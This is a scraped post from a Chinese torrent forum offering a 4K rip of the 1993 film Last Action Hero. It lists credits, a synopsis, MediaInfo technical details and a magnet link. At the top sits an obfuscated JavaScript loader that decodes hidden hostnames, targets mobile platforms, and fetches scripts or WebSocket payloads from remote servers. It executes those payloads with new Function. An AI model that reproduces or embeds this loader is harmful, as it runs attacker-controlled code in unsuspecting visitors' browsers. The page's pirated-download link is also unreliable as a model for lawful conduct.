幻影英雄[国语音轨/简繁字幕]Last.Action.Hero.1993.UHD.BluRay.2160p.2Audio.TrueHD.Atmos.7.1.x265.10bit.HDR-迅雷下载 27.97GB

版主小s 2月前 316

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 幻影英雄 / 最后魔鬼英雄(台) / 最后的打斗英雄 / 最后的动作英雄

◎片 名 Last Action Hero

◎年 代 1993

◎产 地 美国

◎类 别 喜剧 / 动作 / 奇幻 / 冒险

◎语 言 英语

◎上映日期 1993-06-18

◎IMDb链接 https://www.imdb.com/title/tt0107362/

◎豆瓣评分 7.6/10 (7362人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300343/

◎片 长 130 分钟

◎导 演 约翰·麦克蒂尔南 John McTiernan (id:1013971)

◎编 剧 沙恩·布莱克 Shane Black (id:1036569)

David Arnott David Arnott (id:1027345)

扎克·佩恩 Zak Penn (id:1294247)

Adam Leff Adam Leff (id:1289717)

戴维阿诺特 David Arnott (id:1277450)

◎演 员 阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

F·默里·亚伯拉罕 F. Murray Abraham (id:1055073)

阿特·卡尼 Art Carney (id:1041241)

查尔斯·丹斯 Charles Dance (id:1027299)

弗兰克·麦克雷 Frank McRae (id:1115949)

汤姆·诺南 Tom Noonan (id:1002771)

罗伯特·普罗斯基 Robert Prosky (id:1036653)

安东尼·奎恩 Anthony Quinn (id:1048161)

梅塞迪丝·鲁尔 Mercedes Ruehl (id:1032042)

奥斯汀·奥布莱恩 Austin O'Brien (id:1137436)

伊恩·麦克莱恩 Ian McKellen (id:1054410)

田中通教授 Professor Toru Tanaka (id:1157875)

琼·普莱怀特 Joan Plowright (id:1041184)

Keith Barish Keith Barish (id:1042394)

凯伦·达菲 Karen Duffy (id:1081638)

迈克尔·V·格佐 Michael V. Gazzo (id:1000421)

丹尼·德维托 Danny DeVito (id:1040516)

莉扎·吉邦斯 Leeza Gibbons (id:1055925)

詹姆斯·贝鲁什 James Belushi (id:1019035)

达蒙·韦恩斯 Damon Wayans (id:1049623)

小理查德 Little Richard (id:1036872)

尚格·云顿 Jean-Claude Van Damme (id:1027149)

玛利亚·施莱沃 Maria Shriver (id:1040773)

Chris Connelly Chris Connelly (id:1281166)

M.C. Hammer M.C. Hammer (id:1000581)

波斯·怀特 Persia White (id:1040821)

拉里·弗格森 Larry Ferguson (id:1283586)

Ryan Todd Ryan Todd (id:1299339)

Peter Kent Peter Kent (id:1009749)

马文·范·皮伯斯 Melvin Van Peebles (id:1025359)

考林·加普 Colleen Camp (id:1019034)

安娜纳瓦罗 Anna Navarro (id:1134536)

蒂娜·特纳 Tina Turner (id:1036606)

Dagmar Koller Dagmar Koller (id:1107535)

Henry Kingi Henry Kingi (id:1036932)

里克·杜科蒙 Rick Ducommun (id:1090487)

Neriah Davis Neriah Davis (id:1082081)

R.C. Bates R.C. Bates (id:1062485)

Bobbie Brown Bobbie Brown (id:1055317)

罗伯特·帕特里克 Robert Patrick (id:1041135)

安吉·艾佛哈特 Angie Everhart (id:1049727)

小托马斯·罗萨莱斯 Thomas Rosales Jr. (id:1143150)

迈克·马斯喀特 Mike Muscat (id:1019273)

Billy D. Lucas Billy D. Lucas (id:1290412)

切维·切斯 Chevy Chase (id:1027167)

布里吉特·威尔逊 Bridgette Wilson-Sampras (id:1027189)

Anthony Peck Anthony Peck (id:1126867)

史文-欧尔·托尔森 Sven-Ole Thorsen (id:1027355)

莎朗·斯通 Sharon Stone (id:1031822)

诺亚·艾默里奇 Noah Emmerich (id:1032144)

Jason Menz (id:1238843)

Bryan Hanna (id:1237289)

Michael Straka Michael Straka (id:1159121)

Symba Smith Symba Smith (id:1149597)

李·雷赫曼 Lee Reherman (id:1144780)

布鲁斯·洛克 Bruce Locke (id:1322243)

阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

Stephen J. Roth Stephen J. Roth (id:1296173)

Robert E. Relyea Robert E. Relyea (id:1295438)

约翰·麦克蒂尔南 John McTiernan (id:1013971)

迈克尔·凯曼 Michael Kamen (id:1000552)

迪安·塞姆勒 Dean Semler (id:1276583)

理查德·哈里斯 Richard A. Harris (id:1286113)

约翰·赖特 John Wright (id:1301301)

珍妮特·希尔森 Janet Hirshenson (id:1286699)

简·詹金斯 Jane Jenkins (id:1103031)

Marek Dobrowolski Marek Dobrowolski (id:1282504)

瑞克·海因里希斯 Rick Heinrichs (id:1286373)

辛迪·卡尔 Cindy Carr (id:1280140)

尤吉尼欧·扎内蒂 Eugenio Zanetti (id:1301630)

格洛里亚·格雷斯汉 Gloria Gresham (id:1285438)

艾丽西娅·M·特里皮 Alicia M. Tripi (id:1299524)

托马斯·R·伯曼 Thomas R. Burman (id:1279663)

Peter Tothpal Peter Tothpal (id:1276622)

Lucia Mace Lucia Mace (id:1290632)

塔尼亚·麦克科马斯 Tania McComas (id:1291482)

巴里·德雷班德-布尔曼 Bari Dreiband-Burman (id:1282711)

John Naulin John Naulin (id:1292939)

杰夫·道恩 Jeff Dawn (id:1281940)

理查德·斯奈尔 Richard Snell (id:1154637)

Christine Lee Christine Lee (id:1289649)

杰克·加伯 Jake Garber (id:1098012)

彼得·蒙塔格纳 Peter Montagna (id:1125068)

Tricia Sawyer Tricia Sawyer (id:1139245)

Dan Frye Dan Frye (id:1088464)

布鲁斯·莫里亚蒂 Bruce Moriarty (id:1292506)

布莱恩·W·库克 Brian W. Cook (id:1281188)

David Ticotin David Ticotin (id:1299255)

纽维特·阿诺 Newt Arnold (id:1032898)

维克·阿姆斯特朗 Vic Armstrong (id:1027958)

Dana J. Kuznetzkoff Dana J. Kuznetzkoff (id:1289146)

李·奥尔洛夫 Lee Orloff (id:1293624)

Kevin O'Neill Kevin O'Neill (id:1131537)

托尼·加德纳 Tony Gardner (id:1284564)

查克·康米斯基 Chuck Comisky (id:1281099)

Laura Buff Laura Buff (id:1279586)

Bret Mixon Bret Mixon (id:1052332)

罗恩·布林克曼 Ron Brinkmann (id:1279321)

戴尔·拜尔 Dale Baer (id:1277675)

皮特·汉森 Pete Hanson (id:1102387)

特里西亚·亨利·阿什福德 Tricia Henry Ashford (id:1277486)

尼尔·克雷佩拉 Neil Krepela (id:1289019)

理查德·格林伯格 Richard Greenberg (id:1285383)

罗伯特·M·格林伯格 Robert M. Greenberg (id:1285385)

小吉恩·沃伦 Gene Warren Jr. (id:1300455)

John E. Sullivan John E. Sullivan (id:1298626)

雅克·斯特罗维斯 Jacques Stroweis (id:1298561)

David A. Smith David A. Smith (id:1297867)

Alison Savitch Alison Savitch (id:1296779)

斯图尔特·罗伯特森 Stuart Robertson (id:1295796)

塔蒂亚娜·S·里格尔 Tatiana S. Riegel (id:1295665)

马克·尼尔姆斯 Mark Nelmes (id:1293026)

Alan G. Markowitz Alan G. Markowitz (id:1291028)

马克·A·拉索夫 Mark A. Lasoff (id:1289472)

彼得·库兰 Peter Kuran (id:1289126)

Laurel Klick Laurel Klick (id:1288711)

尼古拉斯·布鲁克斯 Nicholas Brooks (id:1045955)

加内克·西尔斯 Janek Sirrs (id:1028831)

Isa Alsup Isa Alsup (id:1017198)

Paul Gentry Paul Gentry (id:1004084)

凯伦·E·戈勒卡斯 Karen E. Goulekas (id:1023670)

吉姆·瑞吉尔 Jim Rygiel (id:1296402)

蒂姆·麦加沃恩 Tim McGovern (id:1011175)

◎标 签 动作 / 美国 / 科幻 / 喜剧 / 施瓦辛格 / 1993 / 阿诺德·施瓦辛格 / 美国电影

◎简 介

杰克系列电影是由施瓦辛格主演的系列电影。在这电影中,施瓦辛格扮演的杰克(阿诺?施瓦辛格 Arnold Schwarzenegger 饰)总是世界的救世主,每当他的老对头班尼迪(查里斯?丹斯 Charles Dance 饰)出来作恶时,杰克总是能及时赶到,讲班尼迪打得落花流水。小男孩丹尼是杰克系列电影的忠实影迷,杰克系列电影的前三集他都能倒背如流。这天他的好朋友,电影放映员尼克给了丹尼一张神奇的电影,丹尼凭着这张电影票进入到了还未上演的杰克系列第四集中。

不料班尼迪抢走了丹尼的电影票,从电影中来到了现实中。他的目标就是除掉杰克的扮演者施瓦辛格,这样在电影世界里就不再有人能够阻止他的邪恶计划。

  1. General

  2. Unique ID : 301254920602403794278643076847820486179 (0xE2A39655E62E1666D94B8EA8AB763623)

  3. Complete name : Last.Action.Hero.199[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 28.0 GiB

  7. Duration : 2 h 10 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 30.6 Mb/s

  10. Encoded date : UTC 2021-07-18 04:46:45

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. HDR format : SMPTE ST 2086, HDR10 compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 10 min

  21. Bit rate : 24.6 Mb/s

  22. Width : 3 840 pixels

  23. Height : 1 606 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0 (Type 2)

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.167

  31. Stream size : 22.5 GiB (81%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 24645 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1606 / interlace=0 / total-frames=188352 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=22.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=3991,1352 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0050 cd/m2, max: 4000 cd/m2

  44. Maximum Content Light Level : 3991 cd/m2

  45. Maximum Frame-Average Light Level : 1352 cd/m2


  46. Audio #1

  47. ID : 2

  48. Format : MLP FBA 16-ch

  49. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name : Dolby TrueHD with Dolby Atmos

  51. Codec ID : A_TRUEHD

  52. Duration : 2 h 10 min

  53. Bit rate mode : Variable

  54. Bit rate : 4 657 kb/s

  55. Maximum bit rate : 8 667 kb/s

  56. Channel(s) : 8 channels

  57. Channel layout : L R C LFE Ls Rs Lb Rb

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 1 200.000 FPS (40 SPF)

  60. Compression mode : Lossless

  61. Stream size : 4.26 GiB (15%)

  62. Title : English Dolby TrueHD 7.1 (Atmos) @ 5415 kbps

  63. Language : English

  64. Default : Yes

  65. Forced : No

  66. Number of dynamic objects : 11

  67. Bed channel count : 1 channel

  68. Bed channel configuration : LFE


  69. Audio #2

  70. ID : 3

  71. Format : AC-3

  72. Format/Info : Audio Coding 3

  73. Commercial name : Dolby Digital

  74. Codec ID : A_AC3

  75. Duration : 2 h 10 min

  76. Bit rate mode : Constant

  77. Bit rate : 640 kb/s

  78. Channel(s) : 6 channels

  79. Channel layout : L R C LFE Ls Rs

  80. Sampling rate : 48.0 kHz

  81. Frame rate : 31.250 FPS (1536 SPF)

  82. Compression mode : Lossy

  83. Stream size : 599 MiB (2%)

  84. Title : English Dolby Digital Audio 5.1 @ 640 kbps

  85. Language : English

  86. Service kind : Complete Main

  87. Default : No

  88. Forced : No


  89. Audio #3

  90. ID : 4

  91. Format : AC-3

  92. Format/Info : Audio Coding 3

  93. Commercial name : Dolby Digital

  94. Codec ID : A_AC3

  95. Duration : 2 h 10 min

  96. Bit rate mode : Constant

  97. Bit rate : 384 kb/s

  98. Channel(s) : 6 channels

  99. Channel layout : L R C LFE Ls Rs

  100. Sampling rate : 48.0 kHz

  101. Frame rate : 31.250 FPS (1536 SPF)

  102. Compression mode : Lossy

  103. Stream size : 360 MiB (1%)

  104. Title : Mandarin Dolby Digital Audio 5.1 @ 384 kbps

  105. Language : Chinese

  106. Service kind : Complete Main

  107. Default : No

  108. Forced : No


  109. Text #1

  110. ID : 5

  111. Format : PGS

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 2 h 10 min

  115. Bit rate : 34.6 kb/s

  116. Count of elements : 3166

  117. Stream size : 32.3 MiB (0%)

  118. Title : Eng/SUP

  119. Language : English

  120. Default : No

  121. Forced : No


  122. Text #2

  123. ID : 6

  124. Format : PGS

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 2 h 2 min

  128. Bit rate : 32.4 kb/s

  129. Count of elements : 2658

  130. Stream size : 28.4 MiB (0%)

  131. Title : Eng/SUP SDH

  132. Language : English

  133. Default : No

  134. Forced : No


  135. Text #3

  136. ID : 7

  137. Format : PGS

  138. Codec ID : S_HDMV/PGS

  139. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  140. Duration : 2 h 2 min

  141. Bit rate : 25.2 kb/s

  142. Count of elements : 2678

  143. Stream size : 22.0 MiB (0%)

  144. Title : Chs/SUP 简体

  145. Language : Chinese

  146. Default : Yes

  147. Forced : No


  148. Text #4

  149. ID : 8

  150. Format : PGS

  151. Codec ID : S_HDMV/PGS

  152. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  153. Duration : 2 h 2 min

  154. Bit rate : 20.0 kb/s

  155. Count of elements : 2464

  156. Stream size : 17.5 MiB (0%)

  157. Title : Cht/SUP 繁体

  158. Language : English

  159. Default : No

  160. Forced : No


  161. Text #5

  162. ID : 9

  163. Format : PGS

  164. Codec ID : S_HDMV/PGS

  165. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  166. Duration : 2 h 4 min

  167. Bit rate : 41.6 kb/s

  168. Count of elements : 2676

  169. Stream size : 37.0 MiB (0%)

  170. Title : Chs/SUP 简英双语

  171. Language : Chinese

  172. Default : No

  173. Forced : No


  174. Text #6

  175. ID : 10

  176. Format : PGS

  177. Codec ID : S_HDMV/PGS

  178. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  179. Duration : 2 h 4 min

  180. Bit rate : 42.6 kb/s

  181. Count of elements : 2676

  182. Stream size : 37.9 MiB (0%)

  183. Title : Cht/SUP 繁英双语

  184. Language : Chinese

  185. Default : No

  186. Forced : No


  187. Menu

  188. 00:00:00.000 : en:第 01 章

  189. 00:08:32.929 : en:第 02 章

  190. 00:19:23.371 : en:第 03 章

  191. 00:30:33.165 : en:第 04 章

  192. 00:37:01.928 : en:第 05 章

  193. 00:46:52.893 : en:第 06 章

  194. 00:51:51.817 : en:第 07 章

  195. 00:59:47.334 : en:第 08 章

  196. 01:07:06.147 : en:第 09 章

  197. 01:18:16.025 : en:第 10 章

  198. 01:24:15.884 : en:第 11 章

  199. 01:32:16.156 : en:第 12 章

  200. 01:45:28.906 : en:第 13 章

  201. 01:50:05.682 : en:第 14 章

  202. 01:58:50.957 : en:第 15 章

  203. 02:02:04.192 : en:第 16 章


TAGS 动作 奇幻 冒险 喜剧

磁力链:
  • magnet:?xt=urn:btih:8FB0F32F6D31788126280EE78E598EC2D0B7D69B
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回